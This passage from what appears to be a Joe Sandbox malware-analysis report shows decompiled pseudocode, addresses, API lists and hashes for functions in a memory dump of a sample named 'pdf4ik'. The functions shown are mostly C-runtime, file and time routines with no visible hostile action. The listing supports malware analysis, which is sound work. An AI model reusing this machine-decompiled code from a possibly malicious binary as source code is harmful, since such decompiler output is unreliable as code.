							 *((intOrPtr*)(_t96 + 0x1c)) = _t42;
							goto L6;
						} else {
							_t107 =  *((char*)(_t96 + 1));
							if( *((char*)(_t96 + 1)) == 0) {
								goto L7;
							} else {
								_t83 =  *((intOrPtr*)(_t96 + 0xc)) + _t42;
								SetFilePointer( *(_t96 + 4),  *((intOrPtr*)(_t96 + 0xc)) + _t42, 0, 0);
								L6:
								if(E29D8C5D0(_t96,  &_v8, _t83, _t107) != 0) {
									goto L7;
								}
							}
						}
					}
					_v8 = 0;
					_t110 = _t91;
					if(_t91 == 0 && E29D8C580(_t96,  &_v8, _t83, _t110) != 0) {
						_t91 = _t91 | 0xffffffff;
					}
					_v16 = 0;
					_t113 = _t91;
					if(_t91 == 0) {
						_t64 = E29D8C580(_t96,  &_v16, _t83, _t113);
						_t114 = _t64;
						if(_t64 != 0 || E29D8C580(_t96,  &_v144, _t83, _t114) != 0) {
							_t91 = _t91 | 0xffffffff;
						}
					}
					_v12 = 0;
					_t117 = _t91;
					if(_t91 != 0 || E29D8C580(_t96,  &_v12, _t83, _t117) != 0 || _v12 != _v144 || _v16 != _t91) {
						L24:
						if( *((char*)(_t96 + 0x10)) != 0) {
							CloseHandle( *(_t96 + 4));
						}
						_push(_t96);
						E29DADF3B();
						goto L27;
					} else {
						_t121 = _v8 - _t91;
						if(_v8 != _t91) {
							goto L24;
						} else {
							_t49 = E29D8C5D0(_t96,  &_v116, _t83, _t121);
							_t122 = _t49;
							if(_t49 != 0) {
								goto L24;
							} else {
								_t51 = E29D8C5D0(_t96,  &_v112, _t83, _t122);
								_t123 = _t51;
								if(_t51 != 0 || E29D8C580(_t96,  &_v140, _t83, _t123) != 0) {
									goto L24;
								} else {
									_t54 =  *((intOrPtr*)(_t96 + 0xc));
									_t85 = _v20;
									_t89 = _v112;
									_t92 = _t54 + _t85;
									if(_t54 + _t85 >= _v116 + _t89) {
										_v136 = _t54 - _v116 - _t89 + _t85;
										__eflags = 0;
										_v148 = _t96;
										_v120 = _t85;
										_v24 = 0;
										 *((intOrPtr*)(_t96 + 0xc)) = 0;
										_t78 = E29DADFE0(_t89, _t92, _t96, 0x80);
										memcpy(_t78,  &_v148, 0x20 << 2);
										E29D8CE10(_t78);
										return _t78;
									} else {
										goto L24;
									}
								}
							}
						}
					}
				}
			}




























                                        0x29d8c87b
                                        0x29d8c880
                                        0x29d8c9b2
                                        0x29d8c9ba
                                        0x29d8c886
                                        0x29d8c886
                                        0x29d8c892
                                        0x29d8c898
                                        0x29d8c8a0
                                        0x29d8c8a5
                                        0x29d8c8ab
                                        0x29d8c8dd
                                        0x29d8c8dd
                                        0x29d8c8ad
                                        0x29d8c8b0
                                        0x29d8c8cc
                                        0x00000000
                                        0x29d8c8b2
                                        0x29d8c8b2
                                        0x29d8c8b6
                                        0x00000000
                                        0x29d8c8b8
                                        0x29d8c8c0
                                        0x29d8c8c4
                                        0x29d8c8cf
                                        0x29d8c8db
                                        0x00000000
                                        0x00000000
                                        0x29d8c8db
                                        0x29d8c8b6
                                        0x29d8c8b0
                                        0x29d8c8e0
                                        0x29d8c8e7
                                        0x29d8c8e9
                                        0x29d8c8f9
                                        0x29d8c8f9
                                        0x29d8c8fc
                                        0x29d8c903
                                        0x29d8c905
                                        0x29d8c90c
                                        0x29d8c911
                                        0x29d8c913
                                        0x29d8c926
                                        0x29d8c926
                                        0x29d8c913
                                        0x29d8c929
                                        0x29d8c930
                                        0x29d8c932
                                        0x29d8c999
                                        0x29d8c99d
                                        0x29d8c9a3
                                        0x29d8c9a3
                                        0x29d8c9a9
                                        0x29d8c9aa
                                        0x00000000
                                        0x29d8c952
                                        0x29d8c952
                                        0x29d8c955
                                        0x00000000
                                        0x29d8c957
                                        0x29d8c95c
                                        0x29d8c961
                                        0x29d8c963
                                        0x00000000
                                        0x29d8c965
                                        0x29d8c96a
                                        0x29d8c96f
                                        0x29d8c971
                                        0x00000000
                                        0x29d8c984
                                        0x29d8c984
                                        0x29d8c987
                                        0x29d8c98a
                                        0x29d8c990
                                        0x29d8c997
                                        0x29d8c9c7
                                        0x29d8c9cd
                                        0x29d8c9cf
                                        0x29d8c9d5
                                        0x29d8c9d8
                                        0x29d8c9db
                                        0x29d8c9e3
                                        0x29d8c9f2
                                        0x29d8c9f9
                                        0x29d8ca06
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8c997
                                        0x29d8c971
                                        0x29d8c963
                                        0x29d8c955
                                        0x29d8c932

                                        APIs
                                        • _memset.LIBCMT ref: 29D8C898
                                          • Part of subcall function 29D8C6A0: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 29D8C6BB
                                          • Part of subcall function 29D8C6A0: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 29D8C6D7
                                          • Part of subcall function 29D8C6A0: _malloc.LIBCMT ref: 29D8C721
                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 29D8C8C4
                                        • CloseHandle.KERNEL32(00000000), ref: 29D8C9A3
                                        • _malloc.LIBCMT ref: 29D8C9DE
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FilePointer$_malloc$CloseHandle_memset
                                        • String ID:
                                        • API String ID: 3969787500-0
                                        • Opcode ID: c21d45e1c3287df5c7c7cd3428cb7b1c68a17e6d2aaf205414d11c92539a1821
                                        • Instruction ID: c82b381c9605e85a2652dfd9c80e3d48fe310f64664f1697e819cffe1d177a0d
                                        • Opcode Fuzzy Hash: c21d45e1c3287df5c7c7cd3428cb7b1c68a17e6d2aaf205414d11c92539a1821
                                        • Instruction Fuzzy Hash: F341D371A41714EBDB21DE75D840B9EB3B4FF85250F008E9EDD5893A82F7309A0B9B60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DAF844 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E29DAF844(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				signed int _t60;
				void* _t65;
				signed int _t66;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t79;
				signed int _t81;
				signed int _t85;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t97;

				_t92 = _a8;
				if(_t92 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t96 = _a16;
					_t100 = _t96;
					if(_t96 != 0) {
						_t79 = _a4;
						__eflags = _t79;
						if(__eflags == 0) {
							goto L3;
						}
						_t60 = _t56 | 0xffffffff;
						_t88 = _t60 % _t92;
						__eflags = _a12 - _t60 / _t92;
						if(__eflags > 0) {
							goto L3;
						}
						_t93 = _t92 * _a12;
						__eflags =  *(_t96 + 0xc) & 0x0000010c;
						_v8 = _t79;
						_v16 = _t93;
						_t78 = _t93;
						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t96 + 0x18);
						}
						__eflags = _t93;
						if(_t93 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t81 =  *(_t96 + 0xc) & 0x00000108;
								__eflags = _t81;
								if(_t81 == 0) {
									L18:
									__eflags = _t78 - _v12;
									if(_t78 < _v12) {
										_t65 = E29DB3709(_t88, _t93,  *_v8, _t96);
										__eflags = _t65 - 0xffffffff;
										if(_t65 == 0xffffffff) {
											L34:
											_t66 = _t93;
											L35:
											return (_t66 - _t78) / _a8;
										}
										_v8 = _v8 + 1;
										_t69 =  *(_t96 + 0x18);
										_t78 = _t78 - 1;
										_v12 = _t69;
										__eflags = _t69;
										if(_t69 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t81;
									if(_t81 == 0) {
										L21:
										__eflags = _v12;
										_t94 = _t78;
										if(_v12 != 0) {
											_t72 = _t78;
											_t88 = _t72 % _v12;
											_t94 = _t94 - _t72 % _v12;
											__eflags = _t94;
										}
										_push(_t94);
										_push(_v8);
										_push(E29DB5E84(_t96));
										_t71 = E29DB6D5F(_t78, _t88, _t94, _t96, __eflags);
										_t97 = _t97 + 0xc;
										__eflags = _t71 - 0xffffffff;
										if(_t71 == 0xffffffff) {
											L36:
											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
											_t66 = _v16;
											goto L35;
										} else {
											_t85 = _t94;
											__eflags = _t71 - _t94;
											if(_t71 <= _t94) {
												_t85 = _t71;
											}
											_v8 = _v8 + _t85;
											_t78 = _t78 - _t85;
											__eflags = _t71 - _t94;
											if(_t71 < _t94) {
												goto L36;
											} else {
												L27:
												_t93 = _v16;
												goto L31;
											}
										}
									}
									_t74 = E29DAF3C4(_t88, _t96);
									__eflags = _t74;
									if(_t74 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t75 =  *(_t96 + 4);
								__eflags = _t75;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t45 = _t96 + 0xc;
									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
									__eflags =  *_t45;
									goto L34;
								}
								_t95 = _t78;
								__eflags = _t78 - _t75;
								if(_t78 >= _t75) {
									_t95 = _t75;
								}
								E29DB0010( *_t96, _v8, _t95);
								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
								 *_t96 =  *_t96 + _t95;
								_t97 = _t97 + 0xc;
								_t78 = _t78 - _t95;
								_v8 = _v8 + _t95;
								goto L27;
								L31:
								__eflags = _t78;
							} while (_t78 != 0);
							goto L32;
						}
					}
					L3:
					 *((intOrPtr*)(E29DB2030(_t100))) = 0x16;
					E29DB39F7();
					goto L4;
				}
			}





























                                        0x29daf84f
                                        0x29daf854
                                        0x29daf873
                                        0x00000000
                                        0x29daf85c
                                        0x29daf85c
                                        0x29daf85f
                                        0x29daf861
                                        0x29daf87a
                                        0x29daf87d
                                        0x29daf87f
                                        0x00000000
                                        0x00000000
                                        0x29daf881
                                        0x29daf886
                                        0x29daf888
                                        0x29daf88b
                                        0x00000000
                                        0x00000000
                                        0x29daf88d
                                        0x29daf891
                                        0x29daf898
                                        0x29daf89b
                                        0x29daf89e
                                        0x29daf8a0
                                        0x29daf8aa
                                        0x29daf8a2
                                        0x29daf8a5
                                        0x29daf8a5
                                        0x29daf8b1
                                        0x29daf8b3
                                        0x29daf978
                                        0x00000000
                                        0x29daf8b9
                                        0x29daf8b9
                                        0x29daf8bc
                                        0x29daf8bc
                                        0x29daf8c2
                                        0x29daf8f3
                                        0x29daf8f3
                                        0x29daf8f6
                                        0x29daf94f
                                        0x29daf956
                                        0x29daf959
                                        0x29daf984
                                        0x29daf984
                                        0x29daf986
                                        0x00000000
                                        0x29daf98a
                                        0x29daf95b
                                        0x29daf95e
                                        0x29daf961
                                        0x29daf962
                                        0x29daf965
                                        0x29daf967
                                        0x29daf969
                                        0x29daf969
                                        0x00000000
                                        0x29daf967
                                        0x29daf8f8
                                        0x29daf8fa
                                        0x29daf907
                                        0x29daf907
                                        0x29daf90b
                                        0x29daf90d
                                        0x29daf911
                                        0x29daf913
                                        0x29daf916
                                        0x29daf916
                                        0x29daf916
                                        0x29daf918
                                        0x29daf919
                                        0x29daf923
                                        0x29daf924
                                        0x29daf929
                                        0x29daf92c
                                        0x29daf92f
                                        0x29daf992
                                        0x29daf992
                                        0x29daf996
                                        0x00000000
                                        0x29daf931
                                        0x29daf931
                                        0x29daf933
                                        0x29daf935
                                        0x29daf937
                                        0x29daf937
                                        0x29daf939
                                        0x29daf93c
                                        0x29daf93e
                                        0x29daf940
                                        0x00000000
                                        0x29daf942
                                        0x29daf942
                                        0x29daf942
                                        0x00000000
                                        0x29daf942
                                        0x29daf940
                                        0x29daf92f
                                        0x29daf8fd
                                        0x29daf903
                                        0x29daf905
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29daf905
                                        0x29daf8c4
                                        0x29daf8c7
                                        0x29daf8c9
                                        0x00000000
                                        0x00000000
                                        0x29daf8cb
                                        0x29daf980
                                        0x29daf980
                                        0x29daf980
                                        0x00000000
                                        0x29daf980
                                        0x29daf8d1
                                        0x29daf8d3
                                        0x29daf8d5
                                        0x29daf8d7
                                        0x29daf8d7
                                        0x29daf8df
                                        0x29daf8e4
                                        0x29daf8e7
                                        0x29daf8e9
                                        0x29daf8ec
                                        0x29daf8ee
                                        0x00000000
                                        0x29daf970
                                        0x29daf970
                                        0x29daf970
                                        0x00000000
                                        0x29daf8b9
                                        0x29daf8b3
                                        0x29daf863
                                        0x29daf868
                                        0x29daf86e
                                        0x00000000
                                        0x29daf86e

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                        • String ID:
                                        • API String ID: 2782032738-0
                                        • Opcode ID: 6b597378c93f628fcead3b743d65e49d447bbd7f6b550e316aec30b7f5e203ad
                                        • Instruction ID: dcbde5467512bd0e7f07f0459c08175391fdb7c93a1f8977e8560dbcc7b22a49
                                        • Opcode Fuzzy Hash: 6b597378c93f628fcead3b743d65e49d447bbd7f6b550e316aec30b7f5e203ad
                                        • Instruction Fuzzy Hash: E941E673A00704ABDB188FBEC58065EBBB5EF80360F2085BDD4959B950D770DA63BB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DBD1EF Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DBD1EF(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E29DAE78E( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E29DB71BF( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E29DB2030(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                        0x29dbd1f9
                                        0x29dbd200
                                        0x29dbd217
                                        0x00000000
                                        0x29dbd207
                                        0x29dbd209
                                        0x29dbd223
                                        0x29dbd228
                                        0x29dbd22b
                                        0x29dbd22e
                                        0x29dbd256
                                        0x29dbd25d
                                        0x29dbd25f
                                        0x29dbd2e0
                                        0x29dbd2fb
                                        0x29dbd2fd
                                        0x29dbd23d
                                        0x29dbd23d
                                        0x29dbd240
                                        0x29dbd242
                                        0x29dbd245
                                        0x29dbd245
                                        0x29dbd245
                                        0x29dbd245
                                        0x00000000
                                        0x29dbd24b
                                        0x29dbd2bf
                                        0x29dbd2bf
                                        0x29dbd2c4
                                        0x29dbd2ca
                                        0x29dbd2cd
                                        0x29dbd2cf
                                        0x29dbd2d2
                                        0x29dbd2d2
                                        0x29dbd2d2
                                        0x29dbd2d2
                                        0x00000000
                                        0x29dbd2d6
                                        0x29dbd261
                                        0x29dbd264
                                        0x29dbd26a
                                        0x29dbd26d
                                        0x29dbd294
                                        0x29dbd297
                                        0x29dbd29d
                                        0x00000000
                                        0x00000000
                                        0x29dbd29f
                                        0x29dbd2a2
                                        0x00000000
                                        0x00000000
                                        0x29dbd2a4
                                        0x29dbd2a4
                                        0x29dbd2aa
                                        0x29dbd2ad
                                        0x29dbd21c
                                        0x29dbd21c
                                        0x29dbd2b6
                                        0x00000000
                                        0x29dbd2b6
                                        0x29dbd26f
                                        0x29dbd272
                                        0x00000000
                                        0x00000000
                                        0x29dbd276
                                        0x29dbd287
                                        0x29dbd28d
                                        0x29dbd28f
                                        0x29dbd292
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbd292
                                        0x29dbd230
                                        0x29dbd233
                                        0x29dbd235
                                        0x29dbd23a
                                        0x29dbd23a
                                        0x00000000
                                        0x29dbd20b
                                        0x29dbd20b
                                        0x29dbd210
                                        0x29dbd214
                                        0x29dbd214
                                        0x00000000
                                        0x29dbd210
                                        0x29dbd209

                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 29DBD223
                                        • __isleadbyte_l.LIBCMT ref: 29DBD256
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,29DAE5FB,?,00000000,00000000,?,?,?,?,29DAE5FB,00000000), ref: 29DBD287
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,29DAE5FB,00000001,00000000,00000000,?,?,?,?,29DAE5FB,00000000), ref: 29DBD2F5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 6268bf2bddd781d3141793cb734fd8b8da66c36867ff2093a7b01043a6f87fe3
                                        • Instruction ID: 38326788a119f148a5bf91a6944e475705116a204699c16235cad87758463216
                                        • Opcode Fuzzy Hash: 6268bf2bddd781d3141793cb734fd8b8da66c36867ff2093a7b01043a6f87fe3
                                        • Instruction Fuzzy Hash: 9B31D2B1A002C6EFDB14DFA4C8A5EAD3BB5BF01310B14856DE5668F591D331D942EB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DADBB1 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E29DADBB1(signed int _a4, signed int _a8, signed int _a9, char _a10) {
				signed char _v7;
				signed char _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				intOrPtr _t42;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				intOrPtr _t57;
				signed int _t59;
				signed int _t64;
				void* _t72;
				void* _t73;
				signed int _t76;

				_t76 = _a8;
				_t79 = _t76;
				if(_t76 != 0) {
					_v16 =  *_t76;
					_t42 =  *((intOrPtr*)(_t76 + 4));
				} else {
					_v16 =  *((intOrPtr*)(E29DB1EE9(_t72, _t73, _t76, _t79) + 8));
					_t42 = E29DB1EC3(_t72, _t73, _t76, _t79);
				}
				_v20 = _t42;
				if(_v16 != 0) {
					_t64 = _a4;
					_push(_t73);
					__eflags = _t64 - 0x100;
					if(_t64 >= 0x100) {
						L11:
						__eflags = _t76;
						if(__eflags != 0) {
							_v12 = _t64;
							_v12 = _v12 >> 8;
							_t47 =  *( *((intOrPtr*)(_t76 + 8)) + (_v12 & 0x000000ff) * 2) >> 0x0000000f & 0x00000001;
							__eflags = _t47;
							L14:
							__eflags = _t47;
							if(__eflags == 0) {
								_a8 = _t64;
								_a9 = 0;
								__eflags = 1;
							} else {
								_push(2);
								_a8 = _v12;
								_a9 = _t64;
								_a10 = 0;
								_pop(1);
							}
							_t51 = E29DB1930(0x100, __eflags, 0, _v16, 0x100,  &_a8, 1,  &_v8, 3, _v20, 1);
							__eflags = _t51;
							if(_t51 != 0) {
								__eflags = _t51 - 1;
								_t52 = _v8 & 0x000000ff;
								if(_t51 != 1) {
									_t52 = _t52 << 0x00000008 | _v7 & 0x000000ff;
									__eflags = _t52;
								}
								goto L21;
							} else {
								L18:
								_t52 = _t64;
								L21:
								return _t52;
							}
						}
						L12:
						_v12 = _t64;
						_v12 = _v12 >> 8;
						_t47 =  *(E29DB1976(_t72, 0x100, _t76, __eflags) + (_v12 & 0x000000ff) * 2) & 0x8000;
						goto L14;
					}
					__eflags = _t76;
					if(_t76 != 0) {
						_t57 =  *((intOrPtr*)(_t76 + 8));
						__eflags =  *(_t57 + _t64 * 2) & 0x00000001;
						if(( *(_t57 + _t64 * 2) & 0x00000001) == 0) {
							goto L18;
						}
						goto L11;
					}
					__eflags = E29DB19F0(_t64);
					if(__eflags != 0) {
						goto L12;
					}
					goto L18;
				} else {
					_t59 = _a4;
					if(_t59 - 0x41 > 0x19) {
						return _t59;
					}
					return _t59 + 0x20;
				}
			}




















                                        0x29dadbba
                                        0x29dadbbd
                                        0x29dadbbf
                                        0x29dadbd5
                                        0x29dadbd8
                                        0x29dadbc1
                                        0x29dadbc9
                                        0x29dadbcc
                                        0x29dadbcc
                                        0x29dadbdf
                                        0x29dadbe2
                                        0x29dadbfc
                                        0x29dadbff
                                        0x29dadc05
                                        0x29dadc07
                                        0x29dadc26
                                        0x29dadc26
                                        0x29dadc28
                                        0x29dadc48
                                        0x29dadc4b
                                        0x29dadc5e
                                        0x29dadc5e
                                        0x29dadc61
                                        0x29dadc61
                                        0x29dadc63
                                        0x29dadc79
                                        0x29dadc7c
                                        0x29dadc80
                                        0x29dadc65
                                        0x29dadc68
                                        0x29dadc6a
                                        0x29dadc6d
                                        0x29dadc70
                                        0x29dadc74
                                        0x29dadc74
                                        0x29dadc97
                                        0x29dadc9f
                                        0x29dadca1
                                        0x29dadca7
                                        0x29dadcaa
                                        0x29dadcae
                                        0x29dadcb7
                                        0x29dadcb7
                                        0x29dadcb7
                                        0x00000000
                                        0x29dadca3
                                        0x29dadca3
                                        0x29dadca3
                                        0x29dadcb9
                                        0x00000000
                                        0x29dadcba
                                        0x29dadca1
                                        0x29dadc2a
                                        0x29dadc2a
                                        0x29dadc2d
                                        0x29dadc3e
                                        0x00000000
                                        0x29dadc3e
                                        0x29dadc09
                                        0x29dadc0b
                                        0x29dadc1d
                                        0x29dadc20
                                        0x29dadc24
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dadc24
                                        0x29dadc14
                                        0x29dadc16
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dadbe4
                                        0x29dadbe4
                                        0x29dadbed
                                        0x29dadcbd
                                        0x29dadcbd
                                        0x00000000
                                        0x29dadbf3

                                        APIs
                                        • ____lc_handle_func.LIBCMT ref: 29DADBC1
                                          • Part of subcall function 29DB1EE9: __getptd.LIBCMT ref: 29DB1EE9
                                        • ____lc_codepage_func.LIBCMT ref: 29DADBCC
                                          • Part of subcall function 29DB1EC3: __getptd.LIBCMT ref: 29DB1EC3
                                        • ___pctype_func.LIBCMT ref: 29DADC31
                                        • ___crtLCMapStringA.LIBCMT ref: 29DADC97
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd$String____lc_codepage_func____lc_handle_func___crt___pctype_func
                                        • String ID:
                                        • API String ID: 3477544643-0
                                        • Opcode ID: 02798bb984ebb1420df963bbb0f11749fab37cb4914cd90187ebd2638bea77e2
                                        • Instruction ID: 6e1fad04668814e4d51bff19589f597102b9ed394bf0911899957ccadfa40af8
                                        • Opcode Fuzzy Hash: 02798bb984ebb1420df963bbb0f11749fab37cb4914cd90187ebd2638bea77e2
                                        • Instruction Fuzzy Hash: 82316C71904254BEDB118F55C891F9D7BF8AF14300F44804EE895DF692DAB8D762EB20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DAC370 Relevance: 6.1, APIs: 4, Instructions: 98timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 85%
                                        			E29DAC370(intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				signed int _v12;
				struct _SYSTEMTIME _v28;
				struct _SYSTEMTIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* __ebx;
				signed int _t41;
				intOrPtr _t43;
				intOrPtr _t51;
				intOrPtr _t72;
				intOrPtr _t84;
				intOrPtr _t87;
				signed int _t95;

				_t94 = __esi;
				_t93 = __edi;
				_t41 =  *0x29dd5664; // 0xd9555f04
				_v12 = _t41 ^ _t95;
				_t43 = _a4;
				 *((intOrPtr*)(__esi + 0x7c)) = 0;
				 *((intOrPtr*)(__esi + 0x84)) = __ecx;
				 *((char*)(__esi + 0x80)) = 0;
				 *((intOrPtr*)(__esi + 0x78)) = 0;
				 *((intOrPtr*)(__esi + 0x90)) = 0;
				 *((intOrPtr*)(__esi + 0x74)) = 0;
				 *((intOrPtr*)(__esi + 0x88)) = _t43;
				 *((intOrPtr*)(__esi + 0x8c)) = 0;
				if(__ecx == 0 || _t43 == 0) {
					return E29DADF46(0x10000, 0, _v12 ^ _t95, _t84, _t93, _t94);
				} else {
					 *((intOrPtr*)(__esi + 0x70)) = _t43;
					 *((intOrPtr*)(__esi + 0x4c)) = 0x80000000;
					 *((char*)(__esi + 0x6c)) = 1;
					GetLocalTime( &_v44);
					SystemTimeToFileTime( &_v44,  &_v52);
					_v60.dwLowDateTime = _v52.dwLowDateTime;
					_v60.dwHighDateTime = _v52.dwHighDateTime;
					FileTimeToSystemTime( &_v60,  &_v28);
					_t87 = _v52.dwHighDateTime;
					asm("sbb edx, 0x19db1de");
					_t51 = E29DB75A0(_v52.dwLowDateTime - 0xd53e8000, _t87, 0x989680, 0);
					 *((intOrPtr*)(__esi + 0x50)) = _t51;
					 *((intOrPtr*)(__esi + 0x58)) = _t51;
					 *((intOrPtr*)(__esi + 0x60)) = _t51;
					_t72 = _t87;
					 *((intOrPtr*)(__esi + 0x5c)) = _t72;
					 *((intOrPtr*)(__esi + 0x64)) = _t72;
					 *((intOrPtr*)(__esi + 0x54)) = _t87;
					 *(__esi + 0x68) = ((_v28.wYear + 0xffffffc4 << 0x00000004 | _v28.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v28.wDay & 0x0000001f) << 0x00000010 | (_v28.wMinute & 0x0000003f | _v28.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v28.wSecond + _v28.wSecond & 0x0000001f;
					return E29DADF46(0, 0, _v12 ^ _t95, ((_v28.wYear + 0xffffffc4 << 0x00000004 | _v28.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v28.wDay & 0x0000001f) << 0x00000010 | (_v28.wMinute & 0x0000003f | _v28.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v28.wSecond + _v28.wSecond & 0x0000001f, __edi, __esi);
				}
			}
















                                        0x29dac370
                                        0x29dac370
                                        0x29dac376
                                        0x29dac37d
                                        0x29dac380
                                        0x29dac386
                                        0x29dac389
                                        0x29dac38f
                                        0x29dac395
                                        0x29dac398
                                        0x29dac39e
                                        0x29dac3a1
                                        0x29dac3a7
                                        0x29dac3af
                                        0x29dac49c
                                        0x29dac3bd
                                        0x29dac3bd
                                        0x29dac3c4
                                        0x29dac3cb
                                        0x29dac3cf
                                        0x29dac3dd
                                        0x29dac3ec
                                        0x29dac3f4
                                        0x29dac3f7
                                        0x29dac400
                                        0x29dac40f
                                        0x29dac417
                                        0x29dac41c
                                        0x29dac41f
                                        0x29dac422
                                        0x29dac428
                                        0x29dac42a
                                        0x29dac42d
                                        0x29dac444
                                        0x29dac473
                                        0x29dac486
                                        0x29dac486

                                        APIs
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC987,?,?,?), ref: 29DAC3CF
